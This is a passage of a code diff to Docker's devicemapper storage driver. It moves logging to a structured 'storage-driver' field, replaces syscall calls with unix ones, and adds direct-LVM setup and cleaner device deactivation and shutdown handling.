devices.markDeviceIDFree(deviceID) - logrus.Debugf("devmapper: Error registering device: %s", err) + logger.Debugf("Error registering device: %s", err) return err } if err := devices.closeTransaction(); err != nil { - devices.unregisterDevice(deviceID, hash) + devices.unregisterDevice(hash) devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) devices.markDeviceIDFree(deviceID) return err @@ -942,20 +947,21 @@ func (devices *DeviceSet) createRegisterSnapDevice(hash string, 
baseInfo *devInf func (devices *DeviceSet) loadMetadata(hash string) *devInfo { info := &devInfo{Hash: hash, devices: devices} + logger := logrus.WithField("storage-driver", "devicemapper") jsonData, err := ioutil.ReadFile(devices.metadataFile(info)) if err != nil { - logrus.Debugf("devmapper: Failed to read %s with err: %v", devices.metadataFile(info), err) + logger.Debugf("Failed to read %s with err: %v", devices.metadataFile(info), err) return nil } if err := json.Unmarshal(jsonData, &info); err != nil { - logrus.Debugf("devmapper: Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err) + logger.Debugf("Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err) return nil } if info.DeviceID > maxDeviceID { - logrus.Errorf("devmapper: Ignoring Invalid DeviceId=%d", info.DeviceID) + logger.Errorf("Ignoring Invalid DeviceId=%d", info.DeviceID) return nil } @@ -970,7 +976,7 @@ func getDeviceUUID(device string) (string, error) { uuid := strings.TrimSuffix(string(out), "\n") uuid = strings.TrimSpace(uuid) - logrus.Debugf("devmapper: UUID for device: %s is:%s", device, uuid) + logrus.WithField("storage-driver", "devicemapper").Debugf("UUID for device: %s is:%s", device, uuid) return uuid, nil } @@ -1018,7 +1024,7 @@ func (devices *DeviceSet) verifyBaseDeviceUUIDFS(baseInfo *devInfo) error { // file system of base image is not same, warn user that dm.fs // will be ignored. if devices.BaseDeviceFilesystem != devices.filesystem { - logrus.Warnf("devmapper: Base device already exists and has filesystem %s on it. User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem) + logrus.WithField("storage-driver", "devicemapper").Warnf("Base device already exists and has filesystem %s on it. 
User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem) devices.filesystem = devices.BaseDeviceFilesystem } return nil @@ -1048,7 +1054,7 @@ func (devices *DeviceSet) saveBaseDeviceUUID(baseInfo *devInfo) error { } func (devices *DeviceSet) createBaseImage() error { - logrus.Debug("devmapper: Initializing base device-mapper thin volume") + logrus.WithField("storage-driver", "devicemapper").Debug("Initializing base device-mapper thin volume") // Create initial device info, err := devices.createRegisterDevice("") @@ -1056,7 +1062,7 @@ func (devices *DeviceSet) createBaseImage() error { return err } - logrus.Debug("devmapper: Creating filesystem on base device-mapper thin volume") + logrus.WithField("storage-driver", "devicemapper").Debug("Creating filesystem on base device-mapper thin volume") if err := devices.activateDeviceIfNeeded(info, false); err != nil { return err @@ -1082,7 +1088,7 @@ func (devices *DeviceSet) createBaseImage() error { // Returns if thin pool device exists or not. If device exists, also makes // sure it is a thin pool device and not some other type of device. 
func (devices *DeviceSet) thinPoolExists(thinPoolDevice string) (bool, error) { - logrus.Debugf("devmapper: Checking for existence of the pool %s", thinPoolDevice) + logrus.WithField("storage-driver", "devicemapper").Debugf("Checking for existence of the pool %s", thinPoolDevice) info, err := devicemapper.GetInfo(thinPoolDevice) if err != nil { @@ -1194,10 +1200,10 @@ func (devices *DeviceSet) growFS(info *devInfo) error { options = joinMountOptions(options, devices.mountOptions) if err := mount.Mount(info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options); err != nil { - return fmt.Errorf("Error mounting '%s' on '%s': %s", info.DevName(), fsMountPoint, err) + return fmt.Errorf("Error mounting '%s' on '%s' (fstype='%s' options='%s'): %s\n%v", info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options, err, string(dmesg.Dmesg(256))) } - defer syscall.Unmount(fsMountPoint, syscall.MNT_DETACH) + defer unix.Unmount(fsMountPoint, unix.MNT_DETACH) switch devices.BaseDeviceFilesystem { case "ext4": @@ -1226,15 +1232,10 @@ func (devices *DeviceSet) setupBaseImage() error { if err := devices.setupVerifyBaseImageUUIDFS(oldInfo); err != nil { return err } - - if err := devices.checkGrowBaseDeviceFS(oldInfo); err != nil { - return err - } - - return nil + return devices.checkGrowBaseDeviceFS(oldInfo) } - logrus.Debug("devmapper: Removing uninitialized base image") + logrus.WithField("storage-driver", "devicemapper").Debug("Removing uninitialized base image") // If previous base device is in deferred delete state, // that needs to be cleaned up first. So don't try // deferred deletion. 
@@ -1252,47 +1253,22 @@ func (devices *DeviceSet) setupBaseImage() error { } // Create new base image device - if err := devices.createBaseImage(); err != nil { - return err - } - - return nil + return devices.createBaseImage() } func setCloseOnExec(name string) { - if fileInfos, _ := ioutil.ReadDir("/proc/self/fd"); fileInfos != nil { - for _, i := range fileInfos { - link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name())) - if link == name { - fd, err := strconv.Atoi(i.Name()) - if err == nil { - syscall.CloseOnExec(fd) - } + fileInfos, _ := ioutil.ReadDir("/proc/self/fd") + for _, i := range fileInfos { + link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name())) + if link == name { + fd, err := strconv.Atoi(i.Name()) + if err == nil { + unix.CloseOnExec(fd) } } } } -// DMLog implements logging using DevMapperLogger interface. -func (devices *DeviceSet) DMLog(level int, file string, line int, dmError int, message string) { - // By default libdm sends us all the messages including debug ones. - // We need to filter out messages here and figure out which one - // should be printed. 
- if level > logLevel { - return - } - - // FIXME(vbatts) push this back into ./pkg/devicemapper/ - if level <= devicemapper.LogLevelErr { - logrus.Errorf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) - } else if level <= devicemapper.LogLevelInfo { - logrus.Infof("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) - } else { - // FIXME(vbatts) push this back into ./pkg/devicemapper/ - logrus.Debugf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) - } -} - func major(device uint64) uint64 { return (device >> 8) & 0xfff } @@ -1400,31 +1376,30 @@ func (devices *DeviceSet) saveTransactionMetaData() error { } func (devices *DeviceSet) removeTransactionMetaData() error { - if err := os.RemoveAll(devices.transactionMetaFile()); err != nil { - return err - } - return nil + return os.RemoveAll(devices.transactionMetaFile()) } func (devices *DeviceSet) rollbackTransaction() error { - logrus.Debugf("devmapper: Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID) + logger := logrus.WithField("storage-driver", "devicemapper") + + logger.Debugf("Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID) // A device id might have already been deleted before transaction // closed. In that case this call will fail. Just leave a message // in case of failure. 
if err := devicemapper.DeleteDevice(devices.getPoolDevName(), devices.DeviceID); err != nil { - logrus.Errorf("devmapper: Unable to delete device: %s", err) + logger.Errorf("Unable to delete device: %s", err) } dinfo := &devInfo{Hash: devices.DeviceIDHash} if err := devices.removeMetadata(dinfo); err != nil { - logrus.Errorf("devmapper: Unable to remove metadata: %s", err) + logger.Errorf("Unable to remove metadata: %s", err) } else { devices.markDeviceIDFree(devices.DeviceID) } if err := devices.removeTransactionMetaData(); err != nil { - logrus.Errorf("devmapper: Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err) + logger.Errorf("Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err) } return nil @@ -1444,7 +1419,7 @@ func (devices *DeviceSet) processPendingTransaction() error { // If open transaction ID is less than pool transaction ID, something // is wrong. Bail out. if devices.OpenTransactionID < devices.TransactionID { - logrus.Errorf("devmapper: Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID) + logrus.WithField("storage-driver", "devicemapper").Errorf("Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID) return nil } @@ -1501,19 +1476,16 @@ func (devices *DeviceSet) refreshTransaction(DeviceID int) error { func (devices *DeviceSet) closeTransaction() error { if err := devices.updatePoolTransactionID(); err != nil { - logrus.Debug("devmapper: Failed to close Transaction") + logrus.WithField("storage-driver", "devicemapper").Debug("Failed to close Transaction") return err } return nil } func determineDriverCapabilities(version string) error { - /* - * Driver version 4.27.0 and greater support deferred activation - * feature. 
- */ + // Kernel driver version >= 4.27.0 support deferred removal - logrus.Debugf("devicemapper: driver version is %s", version) + logrus.WithField("storage-driver", "devicemapper").Debugf("kernel dm driver version is %s", version) versionSplit := strings.Split(version, ".") major, err := strconv.Atoi(versionSplit[0]) @@ -1549,16 +1521,17 @@ func determineDriverCapabilities(version string) error { // Determine the major and minor number of loopback device func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) { - stat, err := file.Stat() + var stat unix.Stat_t + err := unix.Stat(file.Name(), &stat) if err != nil { return 0, 0, err } - dev := stat.Sys().(*syscall.Stat_t).Rdev + dev := stat.Rdev majorNum := major(dev) minorNum := minor(dev) - logrus.Debugf("devmapper: Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum) + logrus.WithField("storage-driver", "devicemapper").Debugf("Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum) return majorNum, minorNum, nil } @@ -1567,7 +1540,7 @@ func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) { func getLoopFileDeviceMajMin(filename string) (string, uint64, uint64, error) { file, err := os.Open(filename) if err != nil { - logrus.Debugf("devmapper: Failed to open file %s", filename) + logrus.WithField("storage-driver", "devicemapper").Debugf("Failed to open file %s", filename) return "", 0, 0, err } @@ -1598,7 +1571,7 @@ func (devices *DeviceSet) getThinPoolDataMetaMajMin() (uint64, uint64, uint64, u return 0, 0, 0, 0, err } - logrus.Debugf("devmapper: poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin) + logrus.WithField("storage-driver", "devicemapper").Debugf("poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin) poolDataMajMinorSplit := strings.Split(poolDataMajMin, ":") poolDataMajor, err := strconv.ParseUint(poolDataMajMinorSplit[0], 10, 32) @@ -1678,7 +1651,7 @@ func (devices *DeviceSet) 
enableDeferredRemovalDeletion() error { if !devicemapper.LibraryDeferredRemovalSupport { return fmt.Errorf("devmapper: Deferred removal can not be enabled as libdm does not support it") } - logrus.Debug("devmapper: Deferred removal support enabled.") + logrus.WithField("storage-driver", "devicemapper").Debug("Deferred removal support enabled.") devices.deferredRemove = true } @@ -1686,36 +1659,25 @@ func (devices *DeviceSet) enableDeferredRemovalDeletion() error { if !devices.deferredRemove { return fmt.Errorf("devmapper: Deferred deletion can not be enabled as deferred removal is not enabled. Enable deferred removal using --storage-opt dm.use_deferred_removal=true parameter") } - logrus.Debug("devmapper: Deferred deletion support enabled.") + logrus.WithField("storage-driver", "devicemapper").Debug("Deferred deletion support enabled.") devices.deferredDelete = true } return nil } -func (devices *DeviceSet) initDevmapper(doInit bool) error { - // give ourselves to libdm as a log handler - devicemapper.LogInit(devices) - - version, err := devicemapper.GetDriverVersion() - if err != nil { - // Can't even get driver version, assume not supported - return graphdriver.ErrNotSupported - } - - if err := determineDriverCapabilities(version); err != nil { - return graphdriver.ErrNotSupported - } - +func (devices *DeviceSet) initDevmapper(doInit bool) (retErr error) { if err := devices.enableDeferredRemovalDeletion(); err != nil { return err } + logger := logrus.WithField("storage-driver", "devicemapper") + // https://github.com/docker/docker/issues/4036 if supported := devicemapper.UdevSetSyncSupport(true); !supported { if dockerversion.IAmStatic == "true" { - logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. 
For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option") + logger.Error("Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/dockerd/#storage-driver-options") } else { - logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option") + logger.Error("Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/dockerd/#storage-driver-options") } if !devices.overrideUdevSyncCheck { @@ -1729,28 +1691,55 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { if err != nil { return err } - if err := idtools.MkdirAs(devices.root, 0700, uid, gid); err != nil && !os.IsExist(err) { + if err := idtools.MkdirAndChown(devices.root, 0700, idtools.IDPair{UID: uid, GID: gid}); err != nil { return err } - if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil && !os.IsExist(err) { + if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil { return err } - // Set the device prefix from the device id and inode of the docker root dir - - st, err := os.Stat(devices.root) + prevSetupConfig, err := readLVMConfig(devices.root) if err != nil { + return err + } + + if !reflect.DeepEqual(devices.lvmSetupConfig, directLVMConfig{}) { + if devices.thinPoolDevice != "" { + return errors.New("cannot setup direct-lvm when `dm.thinpooldev` is also specified") + } + + if !reflect.DeepEqual(prevSetupConfig, 
devices.lvmSetupConfig) { + if !reflect.DeepEqual(prevSetupConfig, directLVMConfig{}) { + return errors.New("changing direct-lvm config is not supported") + } + logger.WithField("direct-lvm-config", devices.lvmSetupConfig).Debugf("Setting up direct lvm mode") + if err := verifyBlockDevice(devices.lvmSetupConfig.Device, lvmSetupConfigForce); err != nil { + return err + } + if err := setupDirectLVM(devices.lvmSetupConfig); err != nil { + return err + } + if err := writeLVMConfig(devices.root, devices.lvmSetupConfig); err != nil { + return err + } + } + devices.thinPoolDevice = "docker-thinpool" + logger.Debugf("Setting dm.thinpooldev to %q", devices.thinPoolDevice) + } + + // Set the device prefix from the device id and inode of the docker root dir + var st unix.Stat_t + if err := unix.Stat(devices.root, &st); err != nil { return fmt.Errorf("devmapper: Error looking up dir %s: %s", devices.root, err) } - sysSt := st.Sys().(*syscall.Stat_t) // "reg-" stands for "regular file". // In the future we might use "dev-" for "device file", etc. // docker-maj,min[-inode] stands for: // - Managed by docker // - The target of this device is at major and minor // - If is defined, use that file inside the device as a loopback image. Otherwise use the device itself. - devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(sysSt.Dev), minor(sysSt.Dev), sysSt.Ino) - logrus.Debugf("devmapper: Generated prefix: %s", devices.devicePrefix) + devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(st.Dev), minor(st.Dev), st.Ino) + logger.Debugf("Generated prefix: %s", devices.devicePrefix) // Check for the existence of the thin-pool device poolExists, err := devices.thinPoolExists(devices.getPoolName()) @@ -1770,7 +1759,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { // If the pool doesn't exist, create it if !poolExists && devices.thinPoolDevice == "" { - logrus.Debug("devmapper: Pool doesn't exist. Creating it.") + logger.Debug("Pool doesn't exist. 
Creating it.") var ( dataFile *os.File @@ -1792,7 +1781,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { data, err := devices.ensureImage("data", devices.dataLoopbackSize) if err != nil { - logrus.Debugf("devmapper: Error device ensureImage (data): %s", err) + logger.Debugf("Error device ensureImage (data): %s", err) return err } @@ -1825,7 +1814,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { metadata, err := devices.ensureImage("metadata", devices.metaDataLoopbackSize) if err != nil { - logrus.Debugf("devmapper: Error device ensureImage (metadata): %s", err) + logger.Debugf("Error device ensureImage (metadata): %s", err) return err } @@ -1846,6 +1835,14 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { if err := devicemapper.CreatePool(devices.getPoolName(), dataFile, metadataFile, devices.thinpBlockSize); err != nil { return err } + defer func() { + if retErr != nil { + err = devices.deactivatePool() + if err != nil { + logger.Warnf("Failed to deactivatePool: %v", err) + } + } + }() } // Pool already exists and caller did not pass us a pool. That means @@ -1854,7 +1851,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { // pool, like is it using loop devices. if poolExists && devices.thinPoolDevice == "" { if err := devices.loadThinPoolLoopBackInfo(); err != nil { - logrus.Debugf("devmapper: Failed to load thin pool loopback device information:%v", err) + logger.Debugf("Failed to load thin pool loopback device information:%v", err) return err } } @@ -1869,7 +1866,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { if devices.thinPoolDevice == "" { if devices.metadataLoopFile != "" || devices.dataLoopFile != "" { - logrus.Warn("devmapper: Usage of loopback devices is strongly discouraged for production use. 
Please use `--storage-opt dm.thinpooldev` or use `man docker` to refer to dm.thinpooldev section.") + logger.Warn("Usage of loopback devices is strongly discouraged for production use. Please use `--storage-opt dm.thinpooldev` or use `man dockerd` to refer to dm.thinpooldev section.") } } @@ -1882,7 +1879,7 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { // Setup the base image if doInit { if err := devices.setupBaseImage(); err != nil { - logrus.Debugf("devmapper: Error device setupBaseImage: %s", err) + logger.Debugf("Error device setupBaseImage: %s", err) return err } } @@ -1892,8 +1889,8 @@ func (devices *DeviceSet) initDevmapper(doInit bool) error { // AddDevice adds a device and registers in the hash. func (devices *DeviceSet) AddDevice(hash, baseHash string, storageOpt map[string]string) error { - logrus.Debugf("devmapper: AddDevice START(hash=%s basehash=%s)", hash, baseHash) - defer logrus.Debugf("devmapper: AddDevice END(hash=%s basehash=%s)", hash, baseHash) + logrus.WithField("storage-driver", "devicemapper").Debugf("AddDevice START(hash=%s basehash=%s)", hash, baseHash) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("AddDevice END(hash=%s basehash=%s)", hash, baseHash) // If a deleted device exists, return error. baseInfo, err := devices.lookupDeviceWithLock(baseHash) @@ -1975,7 +1972,7 @@ func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error { return nil } - logrus.Debugf("devmapper: Marking device %s for deferred deletion.", info.Hash) + logrus.WithField("storage-driver", "devicemapper").Debugf("Marking device %s for deferred deletion.", info.Hash) info.Deleted = true @@ -1992,7 +1989,7 @@ func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error { // Should be called with devices.Lock() held. 
func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) error { if err := devices.openTransaction(info.Hash, info.DeviceID); err != nil { - logrus.Debugf("devmapper: Error opening transaction hash = %s deviceId = %d", "", info.DeviceID) + logrus.WithField("storage-driver", "devicemapper").Debugf("Error opening transaction hash = %s deviceId = %d", "", info.DeviceID) return err } @@ -2004,13 +2001,13 @@ func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) erro // deletion is not enabled, we return an error. If error is // something other then EBUSY, return an error. if syncDelete || !devices.deferredDelete || err != devicemapper.ErrBusy { - logrus.Debugf("devmapper: Error deleting device: %s", err) + logrus.WithField("storage-driver", "devicemapper").Debugf("Error deleting device: %s", err) return err } } if err == nil { - if err := devices.unregisterDevice(info.DeviceID, info.Hash); err != nil { + if err := devices.unregisterDevice(info.Hash); err != nil { return err } // If device was already in deferred delete state that means @@ -2031,8 +2028,9 @@ func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) erro // Issue discard only if device open count is zero. func (devices *DeviceSet) issueDiscard(info *devInfo) error { - logrus.Debugf("devmapper: issueDiscard START(device: %s).", info.Hash) - defer logrus.Debugf("devmapper: issueDiscard END(device: %s).", info.Hash) + logger := logrus.WithField("storage-driver", "devicemapper") + logger.Debugf("issueDiscard START(device: %s).", info.Hash) + defer logger.Debugf("issueDiscard END(device: %s).", info.Hash) // This is a workaround for the kernel not discarding block so // on the thin pool when we remove a thinp device, so we do it // manually. @@ -2048,12 +2046,12 @@ func (devices *DeviceSet) issueDiscard(info *devInfo) error { } if devinfo.OpenCount != 0 { - logrus.Debugf("devmapper: Device: %s is in use. OpenCount=%d. 
Not issuing discards.", info.Hash, devinfo.OpenCount) + logger.Debugf("Device: %s is in use. OpenCount=%d. Not issuing discards.", info.Hash, devinfo.OpenCount) return nil } if err := devicemapper.BlockDeviceDiscard(info.DevName()); err != nil { - logrus.Debugf("devmapper: Error discarding block on device: %s (ignoring)", err) + logger.Debugf("Error discarding block on device: %s (ignoring)", err) } return nil } @@ -2065,24 +2063,29 @@ func (devices *DeviceSet) deleteDevice(info *devInfo, syncDelete bool) error { } // Try to deactivate device in case it is active. - if err := devices.deactivateDevice(info); err != nil { - logrus.Debugf("devmapper: Error deactivating device: %s", err) - return err + // If deferred removal is enabled and deferred deletion is disabled + // then make sure device is removed synchronously. There have been + // some cases of device being busy for short duration and we would + // rather busy wait for device removal to take care of these cases. + deferredRemove := devices.deferredRemove + if !devices.deferredDelete { + deferredRemove = false } - if err := devices.deleteTransaction(info, syncDelete); err != nil { + if err := devices.deactivateDeviceMode(info, deferredRemove); err != nil { + logrus.WithField("storage-driver", "devicemapper").Debugf("Error deactivating device: %s", err) return err } - return nil + return devices.deleteTransaction(info, syncDelete) } // DeleteDevice will return success if device has been marked for deferred // removal. If one wants to override that and want DeleteDevice() to fail if // device was busy and could not be deleted, set syncDelete=true. 
func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error { - logrus.Debugf("devmapper: DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete) - defer logrus.Debugf("devmapper: DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete) + logrus.WithField("storage-driver", "devicemapper").Debugf("DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete) info, err := devices.lookupDeviceWithLock(hash) if err != nil { return err @@ -2098,8 +2101,8 @@ func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error { } func (devices *DeviceSet) deactivatePool() error { - logrus.Debug("devmapper: deactivatePool() START") - defer logrus.Debug("devmapper: deactivatePool() END") + logrus.WithField("storage-driver", "devicemapper").Debug("deactivatePool() START") + defer logrus.WithField("storage-driver", "devicemapper").Debug("deactivatePool() END") devname := devices.getPoolDevName() devinfo, err := devicemapper.GetInfo(devname) @@ -2115,15 +2118,20 @@ func (devices *DeviceSet) deactivatePool() error { } if d, err := devicemapper.GetDeps(devname); err == nil { - logrus.Warnf("devmapper: device %s still has %d active dependents", devname, d.Count) + logrus.WithField("storage-driver", "devicemapper").Warnf("device %s still has %d active dependents", devname, d.Count) } return nil } func (devices *DeviceSet) deactivateDevice(info *devInfo) error { - logrus.Debugf("devmapper: deactivateDevice START(%s)", info.Hash) - defer logrus.Debugf("devmapper: deactivateDevice END(%s)", info.Hash) + return devices.deactivateDeviceMode(info, devices.deferredRemove) +} + +func (devices *DeviceSet) deactivateDeviceMode(info *devInfo, deferredRemove bool) error { + var err error + logrus.WithField("storage-driver", "devicemapper").Debugf("deactivateDevice START(%s)", info.Hash) + defer logrus.WithField("storage-driver", 
"devicemapper").Debugf("deactivateDevice END(%s)", info.Hash) devinfo, err := devicemapper.GetInfo(info.Name()) if err != nil { @@ -2134,14 +2142,17 @@ func (devices *DeviceSet) deactivateDevice(info *devInfo) error { return nil } - if devices.deferredRemove { - if err := devicemapper.RemoveDeviceDeferred(info.Name()); err != nil { - return err - } + if deferredRemove { + err = devicemapper.RemoveDeviceDeferred(info.Name()) } else { - if err := devices.removeDevice(info.Name()); err != nil { - return err - } + err = devices.removeDevice(info.Name()) + } + + // This function's semantics is such that it does not return an + // error if device does not exist. So if device went away by + // the time we actually tried to remove it, do not return error. + if err != devicemapper.ErrEnxio { + return err } return nil } @@ -2150,8 +2161,8 @@ func (devices *DeviceSet) deactivateDevice(info *devInfo) error { func (devices *DeviceSet) removeDevice(devname string) error { var err error - logrus.Debugf("devmapper: removeDevice START(%s)", devname) - defer logrus.Debugf("devmapper: removeDevice END(%s)", devname) + logrus.WithField("storage-driver", "devicemapper").Debugf("removeDevice START(%s)", devname) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("removeDevice END(%s)", devname) for i := 0; i < 200; i++ { err = devicemapper.RemoveDevice(devname) @@ -2177,8 +2188,8 @@ func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error { return nil } - logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded START(%s)", info.Name()) - defer logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded END(%s)", info.Name()) + logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemovalIfNeeded START(%s)", info.Name()) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemovalIfNeeded END(%s)", info.Name()) devinfo, err := devicemapper.GetInfoWithDeferred(info.Name()) if err != nil { @@ -2200,8 +2211,8 @@ 
func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error { } func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error { - logrus.Debugf("devmapper: cancelDeferredRemoval START(%s)", info.Name()) - defer logrus.Debugf("devmapper: cancelDeferredRemoval END(%s)", info.Name()) + logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemoval START(%s)", info.Name()) + defer logrus.WithField("storage-driver", "devicemapper").Debugf("cancelDeferredRemoval END(%s)", info.Name()) var err error @@ -2223,11 +2234,47 @@ func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error { return err } +func (devices *DeviceSet) unmountAndDeactivateAll(dir string) { + logger := logrus.WithField("storage-driver", "devicemapper") + + files, err := ioutil.ReadDir(dir) + if err != nil { + logger.Warnf("unmountAndDeactivate: %s", err) + return + } + + for _, d := range files { + if !d.IsDir() { + continue + } + + name := d.Name() + fullname := path.Join(dir, name) + + // We use MNT_DETACH here in case it is still busy in some running + // container. This means it'll go away from the global scope directly, + // and the device will be released when that container dies. + if err := unix.Unmount(fullname, unix.MNT_DETACH); err != nil && err != unix.EINVAL { + logger.Warnf("Shutdown unmounting %s, error: %s", fullname, err) + } + + if devInfo, err := devices.lookupDevice(name); err != nil { + logger.Debugf("Shutdown lookup device %s, error: %s", name, err) + } else { + if err := devices.deactivateDevice(devInfo); err != nil { + logger.Debugf("Shutdown deactivate %s, error: %s", devInfo.Hash, err) + } + } + } +} + // Shutdown shuts down the device by unmounting the root. 
func (devices *DeviceSet) Shutdown(home string) error { - logrus.Debugf("devmapper: [deviceset %s] Shutdown()", devices.devicePrefix) - logrus.Debugf("devmapper: Shutting down DeviceSet: %s", devices.root) - defer logrus.Debugf("devmapper: [deviceset %s] Shutdown() END", devices.devicePrefix) + logger := logrus.WithField("storage-driver", "devicemapper") + + logger.Debugf("[deviceset %s] Shutdown()", devices.devicePrefix) + logger.Debugf("Shutting down DeviceSet: %s", devices.root) + defer logger.Debugf("[deviceset %s] Shutdown() END", devices.devicePrefix) // Stop deletion worker. This should start delivering new events to // ticker channel. That means no new instance of cleanupDeletedDevice() @@ -2244,45 +2291,7 @@ func (devices *DeviceSet) Shutdown(home string) error { // will be killed and we will not get a chance to save deviceset // metadata. Hence save this early before trying to deactivate devices. devices.saveDeviceSetMetaData() - - // ignore the error since it's just a best effort to not try to unmount something that's mounted - mounts, _ := mount.GetMounts() - mounted := make(map[string]bool, len(mounts)) - for _, mnt := range mounts { - mounted[mnt.Mountpoint] = true - } - - if err := filepath.Walk(path.Join(home, "mnt"), func(p string, info os.FileInfo, err error) error { - if err != nil { - return err - } - if !info.IsDir() { - return nil - } - - if mounted[p] { - // We use MNT_DETACH here in case it is still busy in some running - // container. This means it'll go away from the global scope directly, - // and the device will be released when that container dies. 
- if err := syscall.Unmount(p, syscall.MNT_DETACH); err != nil { - logrus.Debugf("devmapper: Shutdown unmounting %s, error: %s", p, err) - } - } - - if devInfo, err := devices.lookupDevice(path.Base(p)); err != nil { - logrus.Debugf("devmapper: Shutdown lookup device %s, error: %s", path.Base(p), err) - } else { - if err := devices.deactivateDevice(devInfo); err != nil { - logrus.Debugf("devmapper: Shutdown deactivate %s , error: %s", devInfo.Hash, err) - } - } - - return nil - }); err != nil && !os.IsNotExist(err) { - devices.Unlock() - return err - } - + devices.unmountAndDeactivateAll(path.Join(home, "mnt")) devices.Unlock() info, _ := devices.lookupDeviceWithLock("") @@ -2290,7 +2299,7 @@ func (devices *DeviceSet) Shutdown(home string) error { info.lock.Lock() devices.Lock() if err := devices.deactivateDevice(info); err != nil { - logrus.Debugf("devmapper: Shutdown deactivate base , error: %s", err) + logger.Debugf("Shutdown deactivate base , error: %s", err) } devices.Unlock() info.lock.Unlock() @@ -2299,7 +2308,7 @@ func (devices *DeviceSet) Shutdown(home string) error { devices.Lock() if devices.thinPoolDevice == "" { if err := devices.deactivatePool(); err != nil { - logrus.Debugf("devmapper: Shutdown deactivate pool , error: %s", err) + logger.Debugf("Shutdown deactivate pool , error: %s", err) } } devices.Unlock() @@ -2372,12 +2381,12 @@ func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error { options = joinMountOptions(options, label.FormatMountLabel("", mountLabel)) if err := mount.Mount(info.DevName(), path, fstype, options); err != nil { - return fmt.Errorf("devmapper: Error mounting '%s' on '%s': %s", info.DevName(), path, err) + return fmt.Errorf("devmapper: Error mounting '%s' on '%s' (fstype='%s' options='%s'): %s\n%v", info.DevName(), path, fstype, options, err, string(dmesg.Dmesg(256))) } if fstype == "xfs" && devices.xfsNospaceRetries != "" { if err := devices.xfsSetNospaceRetries(info); err != nil { - syscall.Unmount(path, 
